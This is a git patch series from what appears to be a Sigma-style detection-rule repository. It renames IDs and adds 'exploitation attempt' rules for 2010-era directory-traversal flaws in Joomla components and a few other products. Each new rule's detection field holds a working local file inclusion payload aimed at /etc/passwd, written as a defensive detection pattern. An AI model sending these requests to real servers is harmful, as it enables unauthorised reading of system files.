traversal vulnerability in the SmartSite (com_smartsite) component diff --git a/rules/web/web_cve_CVE-2010-1718.yaml b/rules/web/web_cve_CVE-2010-1718.yaml index 22aa3401..9e4d9a4a 100644 --- a/rules/web/web_cve_CVE-2010-1718.yaml +++ b/rules/web/web_cve_CVE-2010-1718.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1718:Joomla! Component Archery Scores 1.0.6 - Local File Inclusion -id: 7f99cad1-85b6-4521-801e-aa27fa249207 -Author: Subhash Popuri (@pbssubhash) +id: 92b06e2a-66ae-47b3-a135-fd2759f05902 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in archeryscores.php in the Archery diff --git a/rules/web/web_cve_CVE-2010-1722.yaml b/rules/web/web_cve_CVE-2010-1722.yaml index 0fc9c72a..a7765c23 100644 --- a/rules/web/web_cve_CVE-2010-1722.yaml +++ b/rules/web/web_cve_CVE-2010-1722.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1722:Joomla! Component Online Market 2.x - Local File Inclusion -id: 2de26e96-5594-4743-a74b-d8687d807efa -Author: Subhash Popuri (@pbssubhash) +id: b0d9873c-08fc-4389-89aa-751d7d8d682e +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Online Market (com_market) component diff --git a/rules/web/web_cve_CVE-2010-1875.yaml b/rules/web/web_cve_CVE-2010-1875.yaml index d85a45fc..e38a061a 100644 --- a/rules/web/web_cve_CVE-2010-1875.yaml +++ b/rules/web/web_cve_CVE-2010-1875.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1875:Joomla! Component Property - Local File Inclusion -id: b2fa9b8b-da34-4598-b0dd-a77e409f786a -Author: Subhash Popuri (@pbssubhash) +id: 454a58b3-a30a-4577-8175-a93d0febcb34 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Real Estate Property (com_properties) diff --git a/rules/web/web_cve_CVE-2010-1953.yaml b/rules/web/web_cve_CVE-2010-1953.yaml index 7317ab8e..b5cb130b 100644 --- a/rules/web/web_cve_CVE-2010-1953.yaml +++ b/rules/web/web_cve_CVE-2010-1953.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1953:Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion -id: 0dcfbc60-2e37-4b43-a916-19cb2b8566d1 -Author: Subhash Popuri (@pbssubhash) +id: e8b2e18e-5a9e-429e-9cd3-a839701736dc +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) diff --git a/rules/web/web_cve_CVE-2010-1954.yaml b/rules/web/web_cve_CVE-2010-1954.yaml index 4b769808..4b1a6939 100644 --- a/rules/web/web_cve_CVE-2010-1954.yaml +++ b/rules/web/web_cve_CVE-2010-1954.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1954:Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion -id: b669a952-66dd-4336-9372-1a91f0f7df69 -Author: Subhash Popuri (@pbssubhash) +id: be925ca8-6808-4c32-951d-6069597c2cab +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) diff --git a/rules/web/web_cve_CVE-2010-1955.yaml b/rules/web/web_cve_CVE-2010-1955.yaml index cfbab60f..fb9bb13f 100644 --- a/rules/web/web_cve_CVE-2010-1955.yaml +++ b/rules/web/web_cve_CVE-2010-1955.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1955:Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion -id: 25f05d16-2cb0-442b-9902-d3ad8cff11f7 -Author: Subhash Popuri (@pbssubhash) +id: 9d34dee7-212f-49a0-a1fe-41b37ea241d9 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) diff --git a/rules/web/web_cve_CVE-2010-1979.yaml b/rules/web/web_cve_CVE-2010-1979.yaml index 02ca8a2a..a88364c8 100644 --- a/rules/web/web_cve_CVE-2010-1979.yaml +++ b/rules/web/web_cve_CVE-2010-1979.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1979:Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion -id: 8d003d22-516d-445b-a8cf-809065ec3d2a -Author: Subhash Popuri (@pbssubhash) +id: 4ccbb33d-d6d9-4f18-bc7f-502bd3cc9481 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) diff --git a/rules/web/web_cve_CVE-2010-1983.yaml b/rules/web/web_cve_CVE-2010-1983.yaml index e3de690f..7543adad 100644 --- a/rules/web/web_cve_CVE-2010-1983.yaml +++ b/rules/web/web_cve_CVE-2010-1983.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1983:Joomla! Component redTWITTER 1.0 - Local File Inclusion -id: ef76c1fe-3653-4530-b55b-0676b399c927 -Author: Subhash Popuri (@pbssubhash) +id: fae044ae-fe67-4a83-809f-7a3203ee1a6d +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) diff --git a/rules/web/web_cve_CVE-2010-2033.yaml b/rules/web/web_cve_CVE-2010-2033.yaml index 12a5c02e..bcb492f1 100644 --- a/rules/web/web_cve_CVE-2010-2033.yaml +++ b/rules/web/web_cve_CVE-2010-2033.yaml @@ -1,6 +1,6 @@ title: CVE-2010-2033:Joomla Percha Categories Tree 0.6 - Local File Inclusion -id: f953c147-a017-4f36-a20f-64c8bf4ec31a -Author: Subhash Popuri (@pbssubhash) +id: 80fca714-f31f-48e7-82cd-07bb3ed0917d +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) diff --git a/rules/web/web_cve_CVE-2010-2036.yaml b/rules/web/web_cve_CVE-2010-2036.yaml index 0057029c..58d3c310 100644 --- a/rules/web/web_cve_CVE-2010-2036.yaml +++ b/rules/web/web_cve_CVE-2010-2036.yaml @@ -1,6 +1,6 @@ title: CVE-2010-2036:Joomla! Component Percha Fields Attach 1.0 - Directory Traversal -id: 3036ae41-8549-429e-ba64-a3dd5991f7f2 -Author: Subhash Popuri (@pbssubhash) +id: b86f1914-f00b-4ba3-8f0b-3db29399d4d7 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) diff --git a/rules/web/web_cve_CVE-2010-2259.yaml b/rules/web/web_cve_CVE-2010-2259.yaml index 2dd1e173..55e68a9e 100644 --- a/rules/web/web_cve_CVE-2010-2259.yaml +++ b/rules/web/web_cve_CVE-2010-2259.yaml @@ -1,6 +1,6 @@ title: CVE-2010-2259:Joomla! Component com_bfsurvey - Local File Inclusion -id: 9876750e-ffd6-41a6-9486-31f17db8ab87 -Author: Subhash Popuri (@pbssubhash) +id: a95a2207-33da-40df-a4ab-f8a53d8e99d9 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component diff --git a/rules/web/web_cve_CVE-2010-2307.yaml b/rules/web/web_cve_CVE-2010-2307.yaml index 221de5f3..3b4a10be 100644 --- a/rules/web/web_cve_CVE-2010-2307.yaml +++ b/rules/web/web_cve_CVE-2010-2307.yaml @@ -1,7 +1,7 @@ title: CVE-2010-2307:Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal -id: c2979f47-e361-4ce4-9f69-8a6a8bdf8916 -Author: Subhash Popuri (@pbssubhash) +id: 6251acca-594f-48d0-8ec8-6f156c844e6e +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Multiple directory traversal vulnerabilities in the web server for Motorola diff --git a/rules/web/web_cve_CVE-2010-2682.yaml b/rules/web/web_cve_CVE-2010-2682.yaml index af009d5e..170858c7 100644 --- a/rules/web/web_cve_CVE-2010-2682.yaml +++ b/rules/web/web_cve_CVE-2010-2682.yaml @@ -1,6 +1,6 @@ title: CVE-2010-2682:Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion -id: a6e33159-2c73-4bde-b40c-cf013d639d8c -Author: Subhash Popuri (@pbssubhash) +id: 1f409782-791f-4d8b-a63b-d0d713463cdb +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) diff --git a/rules/web/web_cve_CVE-2010-2861.yaml b/rules/web/web_cve_CVE-2010-2861.yaml index 57ec00fa..40081783 100644 --- a/rules/web/web_cve_CVE-2010-2861.yaml +++ b/rules/web/web_cve_CVE-2010-2861.yaml @@ -1,6 +1,6 @@ title: CVE-2010-2861:Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI -id: 422116aa-40e3-4e44-a32f-b6c6f5855200 -Author: Subhash Popuri (@pbssubhash) +id: 7ceb4e78-34fa-48a5-be21-a50307631d19 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Multiple directory traversal vulnerabilities in the administrator console diff --git a/rules/web/web_cve_CVE-2010-3426.yaml b/rules/web/web_cve_CVE-2010-3426.yaml index e6d0e930..42379e8a 100644 --- a/rules/web/web_cve_CVE-2010-3426.yaml +++ b/rules/web/web_cve_CVE-2010-3426.yaml @@ -1,6 +1,6 @@ title: CVE-2010-3426:Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion -id: 542e1a33-d6b0-4843-9a27-ad846c2daf22 -Author: Subhash Popuri (@pbssubhash) +id: a991b845-3035-492c-914d-0cb7b0e7bd10 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) diff --git a/rules/web/web_cve_CVE-2010-4231.yaml b/rules/web/web_cve_CVE-2010-4231.yaml index 436138ed..dbe3d725 100644 --- a/rules/web/web_cve_CVE-2010-4231.yaml +++ b/rules/web/web_cve_CVE-2010-4231.yaml @@ -1,6 +1,6 @@ title: CVE-2010-4231:Camtron CMNC-200 IP Camera - Directory Traversal -id: aa46c601-90ce-48b3-b45e-c56eefd86134 -Author: Subhash Popuri (@pbssubhash) +id: 8c7f0cbc-c7cd-4bb5-87ef-9e2ff125b7d8 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. diff --git a/rules/web/web_cve_CVE-2010-4617.yaml b/rules/web/web_cve_CVE-2010-4617.yaml index f925c853..f31d5418 100644 --- a/rules/web/web_cve_CVE-2010-4617.yaml +++ b/rules/web/web_cve_CVE-2010-4617.yaml @@ -1,6 +1,6 @@ title: CVE-2010-4617:Joomla! Component JotLoader 2.2.1 - Local File Inclusion -id: 44d2ed53-964a-420c-a410-c4d44356a0f4 -Author: Subhash Popuri (@pbssubhash) +id: 35c29803-4068-4a64-a007-d2b6984f8c58 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the JotLoader (com_jotloader) component diff --git a/rules/web/web_cve_CVE-2010-5278.yaml b/rules/web/web_cve_CVE-2010-5278.yaml index e8c0a733..fd292926 100644 --- a/rules/web/web_cve_CVE-2010-5278.yaml +++ b/rules/web/web_cve_CVE-2010-5278.yaml @@ -1,6 +1,6 @@ title: CVE-2010-5278:MODx manager - Local File Inclusion -id: 0ed9f57e-d400-4f95-aaa4-6356b8e7eaeb -Author: Subhash Popuri (@pbssubhash) +id: 5e042bf8-67ea-4455-8b75-07c57d7ccdad +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php From 25bcf1695d346ffd29e372b1f932ad3eefb1d3f8 Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Wed, 25 Aug 2021 21:39:20 +0530 Subject: [PATCH 0579/1367] Changed title to reduce the chars --- ...ve_CVE-2010-0943 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-0944 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-1306 exploitation attempt.yaml | 23 ++++++++++++++++ ...ve_CVE-2010-1314 exploitation attempt.yaml | 23 ++++++++++++++++ ...ve_CVE-2010-1345 exploitation attempt.yaml | 23 ++++++++++++++++ ...ve_CVE-2010-1353 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-1474 exploitation attempt.yaml | 26 ++++++++++++++++++ ...ve_CVE-2010-1475 exploitation attempt.yaml | 24 +++++++++++++++++ ...ve_CVE-2010-1495 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-1532 exploitation attempt.yaml | 24 +++++++++++++++++ ...ve_CVE-2010-1533 exploitation attempt.yaml | 23 ++++++++++++++++ ...ve_CVE-2010-1535 exploitation attempt.yaml | 24 +++++++++++++++++ ...ve_CVE-2010-1602 exploitation attempt.yaml | 26 ++++++++++++++++++ ...ve_CVE-2010-1657 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-1718 exploitation attempt.yaml | 24 +++++++++++++++++ ...ve_CVE-2010-1722 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-1875 exploitation attempt.yaml | 26 ++++++++++++++++++ ...ve_CVE-2010-1953 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-1954 exploitation attempt.yaml | 23 ++++++++++++++++ ...ve_CVE-2010-1955 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-1979 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-1983 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-2033 exploitation attempt.yaml | 26 ++++++++++++++++++ ...ve_CVE-2010-2036 exploitation attempt.yaml | 26 ++++++++++++++++++ ...ve_CVE-2010-2259 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-2307 exploitation attempt.yaml | 26 ++++++++++++++++++ ...ve_CVE-2010-2682 exploitation attempt.yaml | 26 ++++++++++++++++++ ...ve_CVE-2010-2861 exploitation attempt.yaml | 27 +++++++++++++++++++ ...ve_CVE-2010-3426 exploitation attempt.yaml | 23 ++++++++++++++++ ...ve_CVE-2010-4231 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-4617 exploitation attempt.yaml | 25 +++++++++++++++++ ...ve_CVE-2010-5278 exploitation attempt.yaml | 26 ++++++++++++++++++ 32 files changed, 794 insertions(+) create mode 100644 rules/web/web_cve_CVE-2010-0943 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-0944 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1306 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1314 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1345 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1353 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1474 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1475 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1495 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1532 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1533 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1535 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1602 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1657 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1718 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1722 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1875 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1953 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1954 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1955 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1979 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-1983 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-2033 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-2036 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-2259 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-2307 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-2682 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-2861 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-3426 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-4231 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-4617 exploitation attempt.yaml create mode 100644 rules/web/web_cve_CVE-2010-5278 exploitation attempt.yaml diff --git a/rules/web/web_cve_CVE-2010-0943 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-0943 exploitation attempt.yaml new file mode 100644 index 00000000..d6be923a --- /dev/null +++ b/rules/web/web_cve_CVE-2010-0943 exploitation attempt.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-0943 exploitation attempt +id: 63b70c55-0d7a-4e2f-a130-11028352b6ff +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) + component for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the controller parameter in a jashowcase action to index.php. +references: +- https://www.exploit-db.com/exploits/11090 +- https://www.cvedetails.com/cve/CVE-2010-0943 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-0944 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-0944 exploitation attempt.yaml new file mode 100644 index 00000000..c38d952b --- /dev/null +++ b/rules/web/web_cve_CVE-2010-0944 exploitation attempt.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-0944 exploitation attempt +id: d30903f7-cb51-445f-81a1-f2948f5fb763 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the JCollection (com_jcollection) + component for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/11088 +- https://www.cvedetails.com/cve/CVE-2010-0944 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1306 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1306 exploitation attempt.yaml new file mode 100644 index 00000000..70431ad7 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1306 exploitation attempt.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-1306 exploitation attempt +id: a12a5acd-3ebf-46b8-9ff3-95daeb84b801 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component + 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files + via a .. (dot dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1314 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1314 exploitation attempt.yaml new file mode 100644 index 00000000..7faa239f --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1314 exploitation attempt.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-1314 exploitation attempt +id: 24c87e4f-7206-451a-9164-364ca4f3c388 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) + component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files + via a .. (dot dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1345 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1345 exploitation attempt.yaml new file mode 100644 index 00000000..25b32926 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1345 exploitation attempt.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-1345 exploitation attempt +id: 5f723f65-f584-49f3-87c0-7babbae20d9d +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) + component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via + a .. (dot dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1353 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1353 exploitation attempt.yaml new file mode 100644 index 00000000..1ba62bda --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1353 exploitation attempt.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1353 exploitation attempt +id: 26d15692-1cfc-4427-8e7d-9a364c2628f3 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) + component for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the view parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12068 +- https://www.cvedetails.com/cve/CVE-2010-1353 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1474 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1474 exploitation attempt.yaml new file mode 100644 index 00000000..21b6dc41 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1474 exploitation attempt.yaml @@ -0,0 +1,26 @@ +title: CVE-2010-1474 exploitation attempt +id: 5b50ffc4-dde4-4905-9da9-eb499ee53971 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) + component 1.5.x for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://www.exploit-db.com/exploits/12182 +- https://www.cvedetails.com/cve/CVE-2010-1474 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1475 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1475 exploitation attempt.yaml new file mode 100644 index 00000000..4786c685 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1475 exploitation attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1475 exploitation attempt +id: 69295f5a-428a-47d6-bf4d-a93bb23270ca +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) + component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1495 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1495 exploitation attempt.yaml new file mode 100644 index 00000000..9e3ef52a --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1495 exploitation attempt.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1495 exploitation attempt +id: e21410ad-5016-457a-a48f-2da871951471 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Matamko (com_matamko) component + 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) + in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12286 +- https://www.cvedetails.com/cve/CVE-2010-1495 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1532 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1532 exploitation attempt.yaml new file mode 100644 index 00000000..bb5f49b8 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1532 exploitation attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1532 exploitation attempt +id: 92b23f0b-aa99-497a-a0f1-f7e632bcad7b +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) + component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1533 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1533 exploitation attempt.yaml new file mode 100644 index 00000000..31ae9336 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1533 exploitation attempt.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-1533 exploitation attempt +id: 2e547af2-0fb1-4d26-829e-fb42d959133c +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the TweetLA (com_tweetla) component + 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1535 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1535 exploitation attempt.yaml new file mode 100644 index 00000000..d2ee67cd --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1535 exploitation attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1535 exploitation attempt +id: 7dbde0a0-bd74-47ba-85f7-32093ffbd50c +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) + component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1602 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1602 exploitation attempt.yaml new file mode 100644 index 00000000..564faaf9 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1602 exploitation attempt.yaml @@ -0,0 +1,26 @@ +title: CVE-2010-1602 exploitation attempt +id: d79bf48d-2705-4da1-929b-37e07764998f +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) + component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://www.exploit-db.com/exploits/12283 +- https://www.cvedetails.com/cve/CVE-2010-1602 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - 